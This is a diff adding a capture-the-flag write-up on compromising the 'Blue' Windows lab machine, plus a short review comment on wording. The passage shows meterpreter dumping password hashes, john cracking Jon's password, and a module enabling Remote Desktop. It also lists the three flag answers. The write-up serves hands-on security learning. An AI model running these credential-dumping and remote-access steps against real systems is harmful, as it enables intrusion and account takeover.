content/post/blue-boot2-root-writeup.md

```diff
@@ -0,0 +1,699 @@
+
+```
+meterpreter > hashdump 
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
+```
+
+And of course, there is Jon. With our hashes and users, I dumped these credentials into a file and ran `john` against it with Kali's copy of the `rockyou.txt` password list.
+
+```bash
+root@kali:~/ctf/blue# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
+Created directory: /root/.john
+Using default input encoding: UTF-8
+Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
+Warning: no OpenMP support for this hash type, consider --fork=2
+Press 'q' or Ctrl-C to abort, almost any other key for status
+                 (Administrator)
+alqfna22         (Jon)
+2g 0:00:00:00 DONE (2020-11-11 02:23) 3.076g/s 15692Kp/s 15692Kc/s 15700KC/s alr19882006..alpusidi
+Warning: passwords printed above might not be all those cracked
+Use the "--show --format=NT" options to display all of the cracked passwords reliably
+Session completed
+```
+
+With the Jon user's password in hand, I ran the `post/windows/manage/enable_rdp` module, while this was probably unnecessary due to having seen the port was available, and was quickly able to connect as the our Jon admin user.
+
+```
+meterpreter > run post/windows/manage/enable_rdp 
+
+[*] Enabling Remote Desktop
+[*]   RDP is already enabled
+[*] Setting Terminal Services service startup mode
+[*]   The Terminal Services service is not set to auto, changing it to auto ...
+[*]   Opening port in local firewall if necessary
+[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201111022704_default_10.10.201.83_host.windows.cle_997445.txt
+```
+
+### Wrapping up
+With a new shell I was able to find each of the 3 flags in fairly standard locations on the C:\ drive.
+
+- C:\flag1.txt flag{access_the_machine}
+- C:\Windows\system32\config\flag2.txt flag{sam_database_elevated_access}
+- C:\Users\Jon\Documents\flag3.txt flag{admin_documents_can_be_valuable}
+
+## Attacking Blue without Metasploit
+Now that the initial attack out of the way I decided to attempt the attack without the help of metasploit for sourcing, packing and executing the exploit. This also imposed the restriction of not having the meterpreter shell to rely on.
+
+While I understood the attack and the host at this point I decided to still run through the motions of host enumeration. For the sake of brevity, I will not repeat some of the callouts of the findings unless there are differences from the first attack.
+
+I started with the same nmap scan with the only difference being that I now supplied `-oA $ATTACKTARGET` to output the results to the host with the target servers ip as a prefix. This was to make up for the limitation of not having the results automatically persisted in `msfdb`.
```

Comment:
I started with the same nmap scan, the only difference being that I instead supplied `-oA $ATTACKTARGET` to output the results to the host with the target server's ip as a prefix.